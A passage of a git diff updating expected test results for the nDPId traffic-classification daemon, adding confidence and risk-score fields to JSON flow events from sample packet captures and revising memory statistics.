{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1429000030766,"flow_last_seen":1429000040059,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3456,"flow_avg_l4_payload_len":864,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000041481,"flow_last_seen":1429000041819,"flow_idle_time":7440000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":232,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1429000050062,"flow_last_seen":1429000052145,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1169,"flow_avg_l4_payload_len":389,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000052348,"flow_last_seen":1429000052688,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":529,"flow_avg_l4_payload_len":264,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000054595,"flow_last_seen":1429000054967,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":765,"flow_avg_l4_payload_len":382,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000052348,"flow_last_seen":1429000052688,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":529,"flow_avg_l4_payload_len":264,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000054595,"flow_last_seen":1429000054967,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":765,"flow_avg_l4_payload_len":382,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1429000031075,"flow_last_seen":1429000031382,"flow_idle_time":7440000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037600,"flow_last_seen":1429000037659,"flow_idle_time":7440000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000117728,"flow_last_seen":1429000118045,"flow_idle_time":7440000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":775,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":678,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037600,"flow_last_seen":1429000037659,"flow_idle_time":7440000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000117728,"flow_last_seen":1429000118045,"flow_idle_time":7440000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":775,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":678,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1429000049060,"flow_last_seen":1429000051518,"flow_idle_time":7440000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":1096,"flow_tot_l4_payload_len":2511,"flow_avg_l4_payload_len":627,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1429000052217,"flow_last_seen":1429000153720,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":42262,"flow_avg_l4_payload_len":650,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1429000052217,"flow_last_seen":1429000153720,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":42262,"flow_avg_l4_payload_len":650,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1429000153937,"flow_last_seen":1429000207676,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5584,"flow_avg_l4_payload_len":698,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1429000207973,"flow_last_seen":1429000236577,"flow_idle_time":7440000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":4656,"flow_avg_l4_payload_len":665,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1429000237766,"flow_last_seen":1429000347404,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":18206,"flow_avg_l4_payload_len":728,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1429000347103,"flow_last_seen":1429000374116,"flow_idle_time":7440000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1192,"flow_tot_l4_payload_len":2530,"flow_avg_l4_payload_len":632,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1429000375190,"flow_last_seen":1429000385363,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3892,"flow_avg_l4_payload_len":556,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000031698,"flow_last_seen":1429000032158,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037314,"flow_last_seen":1429000037771,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000110390,"flow_last_seen":1429000110528,"flow_idle_time":7440000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000031698,"flow_last_seen":1429000032158,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037314,"flow_last_seen":1429000037771,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000110390,"flow_last_seen":1429000110528,"flow_idle_time":7440000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1429000048159,"flow_last_seen":1429000048795,"flow_idle_time":7440000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":1169,"flow_tot_l4_payload_len":2143,"flow_avg_l4_payload_len":714,"midstream":1,"ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00160{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","total-events-serialized":120}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -126,9 +126,9 @@
 ~~ total active/idle flows...: 21/21
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4634853 bytes
-~~ total memory freed........: 4634853 bytes
-~~ total allocations/frees...: 99836/99836
+~~ total memory allocated....: 4711230 bytes
+~~ total memory freed........: 4711230 bytes
+~~ total allocations/frees...: 101426/101426
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 165 chars
 ~~ json string max len.......: 2360 chars
diff --git a/test/results/radius_false_positive.pcapng.out b/test/results/radius_false_positive.pcapng.out
index c06219dff..c842bbb77 100644
--- a/test/results/radius_false_positive.pcapng.out
+++ b/test/results/radius_false_positive.pcapng.out
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595119 bytes
-~~ total memory freed........: 4595119 bytes
-~~ total allocations/frees...: 99563/99563
+~~ total memory allocated....: 4680072 bytes
+~~ total memory freed........: 4680072 bytes
+~~ total allocations/frees...: 101153/101153
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 176 chars
 ~~ json string max len.......: 2148 chars
diff --git a/test/results/rdp.pcap.out b/test/results/rdp.pcap.out
index 3b3d4007d..3ca0f211b 100644
--- a/test/results/rdp.pcap.out
+++ b/test/results/rdp.pcap.out
@@ -3,8 +3,8 @@
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1559207465138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"ts_msec":1559207465138,"pkt":"AgAAAEUAAEAAAEAAQAbIuKwQArnAqAKOzQ4NPfm84lgAAAAAsML\/\/7iqAAACBAT5AQMDBQEBCAoLUEqcAAAAAAQCAAA="}
 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1559207465180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"ts_msec":1559207465180,"pkt":"AgAAAEUAADRflEAAfwYqMMCoAo6sEAK5DT3NDkeav7z5vOJZgBL6AEVOAAACBAW0AQMDAAEBBAI="}
 00424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1559207465181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":44,"pkt_l4_len":20,"ts_msec":1559207465181,"pkt":"AgAAAEUAACgAAEAAQAbI0KwQArnAqAKOzQ4NPfm84llHmr+9UBAgAGAaAAA="}
-00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1559207465138,"flow_last_seen":1559207465181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1559207465181,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30":"Desktop\/File Sharing Session"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}}
-00708{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2010,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2010,"flow_first_seen":1559207465138,"flow_last_seen":1559207472692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1273,"flow_tot_l4_payload_len":534243,"flow_avg_l4_payload_len":265,"midstream":0,"ts_msec":1559207472692,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"30":"Desktop\/File Sharing Session"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}}
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1559207465138,"flow_last_seen":1559207465181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1559207465181,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}}
+00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2010,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2010,"flow_first_seen":1559207465138,"flow_last_seen":1559207472692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1273,"flow_tot_l4_payload_len":534243,"flow_avg_l4_payload_len":265,"midstream":0,"ts_msec":1559207472692,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}}
 00153{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2010,"source":"rdp.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 2010/2010
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4653119 bytes
-~~ total memory freed........: 4653119 bytes
-~~ total allocations/frees...: 101563/101563
+~~ total memory allocated....: 4738072 bytes
+~~ total memory freed........: 4738072 bytes
+~~ total allocations/frees...: 103153/103153
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 158 chars
-~~ json string max len.......: 713 chars
-~~ json string avg len.......: 488 chars
+~~ json string max len.......: 821 chars
+~~ json string avg len.......: 536 chars
diff --git a/test/results/reasm_crash_anon.pcapng.out b/test/results/reasm_crash_anon.pcapng.out
index 1a56795e9..fa4fdde8c 100644
--- a/test/results/reasm_crash_anon.pcapng.out
+++ b/test/results/reasm_crash_anon.pcapng.out
@@ -32,9 +32,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4609688 bytes
-~~ total memory freed........: 4609688 bytes
-~~ total allocations/frees...: 99757/99757
+~~ total memory allocated....: 4694641 bytes
+~~ total memory freed........: 4694641 bytes
+~~ total allocations/frees...: 101347/101347
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 173 chars
 ~~ json string max len.......: 650 chars
diff --git a/test/results/reasm_segv_anon.pcapng.out b/test/results/reasm_segv_anon.pcapng.out
index c58302443..5e66de56e 100644
--- a/test/results/reasm_segv_anon.pcapng.out
+++ b/test/results/reasm_segv_anon.pcapng.out
@@ -3,7 +3,7 @@
 00223{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":106,"expected":110}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1550422828553,"flow_last_seen":1550422828553,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1550422828553,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1550422828553,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1550422828553,"pkt":"AAAAcxs8EFFy5LtdCABFeABcpb4AAEARUG2RTALsu2A0VQhoCGgASAAAMv8AOAn8kEPKcwAARQAANFkiQAB\/BgGSrBEkFT++kSvhEwBQ8LOPBjqqVCGAEAEBeCMAAAEBBQo6qnTxOqqFWQ=="}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1550422828553,"flow_last_seen":1550422828553,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1550422828553,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","ndpi": {"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}}
